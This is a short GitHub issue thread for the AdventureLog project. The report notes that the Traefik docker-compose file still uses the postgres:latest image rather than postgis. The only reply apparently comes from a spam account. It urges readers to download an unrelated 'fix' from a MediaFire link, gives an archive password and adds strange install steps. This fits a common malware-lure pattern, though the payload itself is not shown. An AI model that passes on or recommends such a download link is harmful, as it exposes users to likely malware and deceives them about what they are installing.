### ISSUE TITLE
[Bug] Traefik compose still points to postgres

### ISSUE THREAD

**Issue by lovwyr** [seanmorley15/AdventureLog#280]
[docker-compose-traefik.yaml](https://github.com/seanmorley15/AdventureLog/blob/main/docker-compose-traefik.yaml)

still has image postgres:latest not postgis/postgis:15-3.3 :)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
